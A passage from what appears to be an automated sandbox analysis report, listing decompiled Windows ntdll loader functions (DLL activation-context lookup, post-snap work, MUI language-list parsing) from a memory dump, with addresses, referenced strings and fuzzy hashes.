							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00FEF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00FF1370(_t276, 0xf84e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00FEBB40(0,  &_v68, _t170);
									if(L00FB43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00FEBB40(_t257,  &_v68, _t243);
								if(L00FB43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00FF1370(_t278, 0xf84e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00FC4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00FEF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00FF1370(_v16, 0xf84e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00FEBB40(_t262,  &_v68, _t244);
								if(L00FB43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00FF1370(_t282, 0xf84e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00FEBB40(_t262,  &_v68, _t201);
							if(L00FB43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00FC4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00FEF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00FF1370(_t280, 0xf84e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00FEBB40(_t267,  &_v68, _t245);
							if(L00FB43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00FF1370(_t284, 0xf84e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00FEBB40(_t267,  &_v68, _t224);
						if(L00FB43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                              0x00fb3d3c
                                              0x00fb3d42
                                              0x00fb3d44
                                              0x00fb3d46
                                              0x00fb3d49
                                              0x00fb3d4c
                                              0x00fb3d4f
                                              0x00fb3d52
                                              0x00fb3d55
                                              0x00fb3d58
                                              0x00fb3d5b
                                              0x00fb3d5f
                                              0x00fb3d61
                                              0x00fb3d66
                                              0x01008213
                                              0x01008218
                                              0x00fb4085
                                              0x00fb4088
                                              0x00fb408e
                                              0x00fb4094
                                              0x00fb409a
                                              0x00fb40a0
                                              0x00fb40a6
                                              0x00fb40a9
                                              0x00fb40af
                                              0x00fb40b6
                                              0x00fb40bd
                                              0x00fb40bd
                                              0x00fb3d83
                                              0x0100821f
                                              0x01008229
                                              0x01008238
                                              0x01008238
                                              0x0100823d
                                              0x0100823d
                                              0x00fb3da0
                                              0x00fb3daf
                                              0x00fb3db5
                                              0x00fb3dba
                                              0x00fb3dba
                                              0x00fb3dd4
                                              0x00fb3e94
                                              0x00fb3eab
                                              0x00fb3f6d
                                              0x00fb3f84
                                              0x00fb406b
                                              0x00fb406b
                                              0x00fb406e
                                              0x00fb406e
                                              0x00fb4070
                                              0x00fb4074
                                              0x01008351
                                              0x01008351
                                              0x00fb407a
                                              0x00fb407f
                                              0x0100835d
                                              0x01008370
                                              0x01008377
                                              0x01008379
                                              0x0100837c
                                              0x0100837c
                                              0x0100835d
                                              0x00000000
                                              0x00fb407f
                                              0x00fb3f8a
                                              0x00fb3f8d
                                              0x00fb3f90
                                              0x00fb3f95
                                              0x0100830d
                                              0x0100830f
                                              0x00fb3f9b
                                              0x00fb3fac
                                              0x00fb3fae
                                              0x00fb3fb1
                                              0x00fb3fb1
                                              0x00fb3fb6
                                              0x01008317
                                              0x0100831a
                                              0x00000000
                                              0x00fb3fbc
                                              0x00fb3fc1
                                              0x00fb3fc9
                                              0x00fb3fd7
                                              0x00fb3fda
                                              0x00fb3fdd
                                              0x00fb4021
                                              0x00fb4021
                                              0x00fb4029
                                              0x00fb4030
                                              0x00fb4044
                                              0x00fb4046
                                              0x00fb4046
                                              0x00fb4044
                                              0x00fb4049
                                              0x01008327
                                              0x01008334
                                              0x01008339
                                              0x0100833c
                                              0x00fb404f
                                              0x00fb404f
                                              0x00fb404f
                                              0x00fb4051
                                              0x00fb4056
                                              0x00fb4063
                                              0x00fb4063
                                              0x00fb4068
                                              0x00000000
                                              0x00fb4068
                                              0x00fb3fdf
                                              0x00fb3fe2
                                              0x00fb3fe4
                                              0x00fb3fe7
                                              0x00fb3fef
                                              0x00fb4003
                                              0x00fb4005
                                              0x00fb4005
                                              0x00fb400c
                                              0x00fb4013
                                              0x00fb4016
                                              0x00fb4017
                                              0x00fb401b
                                              0x00fb401e
                                              0x00000000
                                              0x00fb401e
                                              0x00fb3fb6
                                              0x00fb3eb1
                                              0x00fb3eb4
                                              0x00fb3eb7
                                              0x00fb3ebc
                                              0x010082a9
                                              0x010082ab
                                              0x00fb3ec2
                                              0x00fb3ed3
                                              0x00fb3ed5
                                              0x00fb3ed8
                                              0x00fb3ed8
                                              0x00fb3edd
                                              0x010082b3
                                              0x010082b6
                                              0x00000000
                                              0x00fb3ee3
                                              0x00fb3ee8
                                              0x00fb3eed
                                              0x00fb3ef0
                                              0x00fb3ef3
                                              0x00fb3f02
                                              0x00fb3f05
                                              0x00fb3f08
                                              0x010082c0
                                              0x010082c3
                                              0x010082c5
                                              0x010082c8
                                              0x010082d0
                                              0x010082e4
                                              0x010082e6
                                              0x010082e6
                                              0x010082ed
                                              0x010082f4
                                              0x010082f7
                                              0x010082f8
                                              0x010082fc
                                              0x010082ff
                                              0x010082ff
                                              0x00fb3f0e
                                              0x00fb3f11
                                              0x00fb3f16
                                              0x00fb3f1d
                                              0x00fb3f31
                                              0x01008307
                                              0x01008307
                                              0x00fb3f31
                                              0x00fb3f39
                                              0x00fb3f48
                                              0x00fb3f4d
                                              0x00fb3f50
                                              0x00fb3f50
                                              0x00fb3f53
                                              0x00fb3f58
                                              0x00fb3f65
                                              0x00fb3f65
                                              0x00fb3f6a
                                              0x00000000
                                              0x00fb3f6a
                                              0x00fb3edd
                                              0x00fb3dda
                                              0x00fb3ddd
                                              0x00fb3de0
                                              0x00fb3de5
                                              0x01008245
                                              0x00fb3deb
                                              0x00fb3df7
                                              0x00fb3dfc
                                              0x00fb3dfe
                                              0x00fb3e01
                                              0x00fb3e01
                                              0x00fb3e06
                                              0x0100824d
                                              0x0100824f
                                              0x01008254
                                              0x00000000
                                              0x00fb3e0c
                                              0x00fb3e11
                                              0x00fb3e16
                                              0x00fb3e19
                                              0x00fb3e29
                                              0x00fb3e2c
                                              0x00fb3e2f
                                              0x0100825c
                                              0x0100825f
                                              0x01008261
                                              0x01008264
                                              0x0100826c
                                              0x01008280
                                              0x01008282
                                              0x01008282
                                              0x01008289
                                              0x01008290
                                              0x01008293
                                              0x01008294
                                              0x01008298
                                              0x0100829b
                                              0x0100829b
                                              0x00fb3e35
                                              0x00fb3e38
                                              0x00fb3e3d
                                              0x00fb3e44
                                              0x00fb3e58
                                              0x010082a3
                                              0x010082a3
                                              0x00fb3e58
                                              0x00fb3e60
                                              0x00fb3e6f
                                              0x00fb3e74
                                              0x00fb3e77
                                              0x00fb3e77
                                              0x00fb3e7a
                                              0x00fb3e7f
                                              0x00fb3e8c
                                              0x00fb3e8c
                                              0x00fb3e91
                                              0x00000000
                                              0x00fb3e91

                                              Strings
                                              • Kernel-MUI-Language-SKU, xrefs: 00FB3F70
                                              • WindowsExcludedProcs, xrefs: 00FB3D6F
                                              • Kernel-MUI-Number-Allowed, xrefs: 00FB3D8C
                                              • Kernel-MUI-Language-Disallowed, xrefs: 00FB3E97
                                              • Kernel-MUI-Language-Allowed, xrefs: 00FB3DC0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 0baf877336970f783f5f0084c83853e0e9bc371858b7976a6a6a96cf327b7c75
                                              • Instruction ID: b1bcd092ca4e9cdb20b586833fd2774826d7119a80d1b59648492cdd7ebb2e39
                                              • Opcode Fuzzy Hash: 0baf877336970f783f5f0084c83853e0e9bc371858b7976a6a6a96cf327b7c75
                                              • Instruction Fuzzy Hash: 12F14C72D00659EBCB11DF99C981AEEBBB9FF48750F14406AE505A7251E734AE00EFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FD8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E00FD8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x109d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1098464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1095780 & 0x00000003) != 0) {
							E01025510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1095780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00FEB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1097984; // 0xb42af8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1098464; // 0x74e10110
					 *0x109b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00FD9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1095780 & 0x00000005) != 0) {
						_push(_t49);
						E01025510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                              0x00fd8e0f
                                              0x00fd8e16
                                              0x00fd8e19
                                              0x00fd8e1b
                                              0x00fd8e21
                                              0x00fd8e7f
                                              0x00fd8e85
                                              0x01019354
                                              0x0101936c
                                              0x01019371
                                              0x0101937b
                                              0x01019381
                                              0x01019381
                                              0x0101937b
                                              0x00fd8e9d
                                              0x00fd8e9d
                                              0x00fd8e29
                                              0x00fd8e2c
                                              0x00fd8e38
                                              0x00fd8e3e
                                              0x00fd8e43
                                              0x00fd8eb5
                                              0x00fd8eb9
                                              0x010192aa
                                              0x010192af
                                              0x010192e8
                                              0x010192e8
                                              0x010192af
                                              0x00fd8eb9
                                              0x00fd8e45
                                              0x00fd8e53
                                              0x00fd8e5b
                                              0x00fd8e5f
                                              0x00fd8e78
                                              0x00fd8e78
                                              0x00fd8e7d
                                              0x00fd8ec3
                                              0x00fd8ecd
                                              0x00fd8ed2
                                              0x00fd8ed2
                                              0x00fd8ec5
                                              0x00fd8ec5
                                              0x00000000
                                              0x00fd8e7d
                                              0x00fd8e67
                                              0x00fd8ea4
                                              0x0101931a
                                              0x00000000
                                              0x00000000
                                              0x01019320
                                              0x00fd8ea4
                                              0x00fd8e70
                                              0x01019325
                                              0x01019340
                                              0x01019345
                                              0x01019345
                                              0x00fd8e76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0101932A
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 0101933B, 01019367
                                              • LdrpFindDllActivationContext, xrefs: 01019331, 0101935D
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 01019357
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-3779518884
                                              • Opcode ID: 6b8a09ebc1545ded3625b9bd43ca90b469d7d2b3f4b6f30f8ee04ade257b3210
                                              • Instruction ID: 99dde20f045b4827b66ad037982da1c6eed9af279952caa784e184b07f281229
                                              • Opcode Fuzzy Hash: 6b8a09ebc1545ded3625b9bd43ca90b469d7d2b3f4b6f30f8ee04ade257b3210
                                              • Instruction Fuzzy Hash: B9413C32E003159EDB316B88CC59B79B3B2BB013A4F0D856BD44457391EF749D81ABC1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FB8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00FB8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00FB934A() != 0) {
								_t159 = E0102A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1095780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01025510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1095780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00FB849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00FB8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00FB8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1095c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1095c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00FC2280(_t92, 0x10986cc);
															_t94 = E01079DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00FD61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1095c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00FB8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1095c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1095c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00FEF380(_t136, 0xf81184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00FC2280(_t108, 0x10986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00FD61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01079D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00FBFFB0(_t118, _t156, 0x10986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00FE9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                              0x00fb8799
                                              0x00fb879d
                                              0x00fb87a1
                                              0x00fb87a3
                                              0x00fb87a8
                                              0x00fb87c3
                                              0x00fb87c3
                                              0x00fb87c8
                                              0x00fb87d1
                                              0x00fb87d4
                                              0x00fb87d8
                                              0x00fb87e5
                                              0x00fb87ec
                                              0x01009bfe
                                              0x01009c00
                                              0x01009c02
                                              0x01009c08
                                              0x01009c0d
                                              0x01009c0f
                                              0x01009c14
                                              0x01009c2d
                                              0x01009c32
                                              0x01009c37
                                              0x01009c3a
                                              0x01009c3c
                                              0x01009c42
                                              0x01009c42
                                              0x01009c3c
                                              0x01009c02
                                              0x00fb87da
                                              0x00fb87df
                                              0x00fb87e3
                                              0x00000000
                                              0x00000000
                                              0x00fb87e3
                                              0x00fb87f2
                                              0x00000000
                                              0x00fb87fb
                                              0x00fb87fd
                                              0x00fb87fe
                                              0x00fb880e
                                              0x00fb880f
                                              0x00fb8810
                                              0x00fb8814
                                              0x00fb881a
                                              0x00fb881c
                                              0x00fb881f
                                              0x00fb8821
                                              0x00fb8822
                                              0x00fb8824
                                              0x00fb8826
                                              0x00fb882c
                                              0x00fb882e
                                              0x01009c48
                                              0x01009c48
                                              0x00fb8834
                                              0x00fb8834
                                              0x00fb8837
                                              0x00000000
                                              0x00000000
                                              0x00fb8837
                                              0x00fb882e
                                              0x00fb883d
                                              0x00fb8840
                                              0x00fb8843
                                              0x00fb8846
                                              0x00fb8849
                                              0x00fb884c
                                              0x00fb884e
                                              0x00fb8850
                                              0x00fb8852
                                              0x00fb8854
                                              0x00fb8857
                                              0x00fb88b4
                                              0x00fb88b6
                                              0x00fb88b6
                                              0x00fb8859
                                              0x00fb8859
                                              0x00fb8859
                                              0x00fb8861
                                              0x00fb8866
                                              0x00fb886a
                                              0x00fb893d
                                              0x00fb8941
                                              0x00000000
                                              0x00fb8947
                                              0x00fb8947
                                              0x00fb894a
                                              0x00fb894c
                                              0x00000000
                                              0x00fb8952
                                              0x00fb8955
                                              0x00fb895a
                                              0x00fb895d
                                              0x00fb895d
                                              0x00fb895f
                                              0x00fb8961
                                              0x00fb8961
                                              0x00fb8968
                                              0x00000000
                                              0x00000000
                                              0x00fb896a
                                              0x00fb896b
                                              0x00fb896e
                                              0x00000000
                                              0x00fb8970
                                              0x00fb8970
                                              0x00fb8970
                                              0x00fb8970
                                              0x00fb8972
                                              0x00fb8972
                                              0x00fb8974
                                              0x00000000
                                              0x00fb897a
                                              0x00fb897a
                                              0x00fb897d
                                              0x00000000
                                              0x00fb8983
                                              0x01009c65
                                              0x01009c6d
                                              0x01009c72
                                              0x01009c75
                                              0x01009c75
                                              0x01009c82
                                              0x01009c86
                                              0x01009c87
                                              0x01009c88
                                              0x01009c89
                                              0x01009c8c
                                              0x01009c90
                                              0x01009c95
                                              0x01009c97
                                              0x01009ca0
                                              0x01009ca3
                                              0x01009ca9
                                              0x01009ca9
                                              0x00000000
                                              0x01009ca9
                                              0x01009ca3
                                              0x00000000
                                              0x01009c97
                                              0x00fb897d
                                              0x00000000
                                              0x00fb8974
                                              0x00fb8988
                                              0x00fb8992
                                              0x00fb8996
                                              0x00000000
                                              0x00fb8996
                                              0x00fb894c
                                              0x00000000
                                              0x00fb8870
                                              0x00fb887b
                                              0x00fb887d
                                              0x00fb887f
                                              0x00fb8881
                                              0x00fb8884
                                              0x00fb8884
                                              0x00fb8886
                                              0x00fb8889
                                              0x00fb888c
                                              0x00fb888e
                                              0x00fb8891
                                              0x00fb8891
                                              0x00fb8898
                                              0x00000000
                                              0x00000000
                                              0x00fb889a
                                              0x00fb889b
                                              0x00fb889e
                                              0x00000000
                                              0x00000000
                                              0x00fb88a0
                                              0x00fb88a8
                                              0x00fb88b0
                                              0x00fb88b2
                                              0x00fb88d3
                                              0x00fb88d5
                                              0x00000000
                                              0x00fb88d7
                                              0x00fb88db
                                              0x00fb88dc
                                              0x00fb88e0
                                              0x00fb88e8
                                              0x00fb88ee
                                              0x00fb88f0
                                              0x00fb88f3
                                              0x00fb88fc
                                              0x00fb8901
                                              0x00fb8906
                                              0x00fb890c
                                              0x00fb890c
                                              0x00fb890f
                                              0x00fb8916
                                              0x00fb8917
                                              0x00fb8918
                                              0x00fb8919
                                              0x00fb891a
                                              0x00fb891f
                                              0x00fb8921
                                              0x01009c52
                                              0x01009c55
                                              0x01009c5b
                                              0x01009cac
                                              0x01009cc0
                                              0x01009cc0
                                              0x01009c55
                                              0x00fb8927
                                              0x00fb8927
                                              0x00fb892f
                                              0x00fb8933
                                              0x00000000
                                              0x00fb88f5
                                              0x00fb88f5
                                              0x00000000
                                              0x00fb88f7
                                              0x00fb88f7
                                              0x00fb88fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00fb88fa
                                              0x00fb88f5
                                              0x00fb88f3
                                              0x00000000
                                              0x00fb88d5
                                              0x00000000
                                              0x00fb88b2
                                              0x00fb88c9
                                              0x00000000
                                              0x00fb88c9
                                              0x00fb887f
                                              0x00fb886a
                                              0x00fb8857
                                              0x00fb8852
                                              0x00fb88bf
                                              0x00fb88bf
                                              0x00fb87aa
                                              0x00fb87ad
                                              0x00fb87ae
                                              0x00fb87b4
                                              0x00fb87b5
                                              0x00fb87b6
                                              0x00fb87b8
                                              0x00fb87bd
                                              0x00fb87c1
                                              0x00fb87f4
                                              0x00fb87fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00fb87c1
                                              0x00000000

